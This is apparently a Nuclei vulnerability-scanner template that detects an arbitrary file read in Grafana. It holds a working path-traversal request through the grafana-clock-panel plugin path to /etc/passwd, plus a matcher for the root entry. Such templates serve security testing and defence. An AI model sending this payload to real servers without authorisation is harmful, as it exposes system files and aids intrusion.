id: grafana-lfr
info:
  name: Grafana Arbitrary File Read
  author: princechaddha
  severity: high
  reference: https://twitter.com/pyn3rd/status/1468138032477859841?t=dedMCALhjWG4KTuHNJzACw&s=19
  tags: lfi,grafana

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/grafana-clock-panel/../../../../../../etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
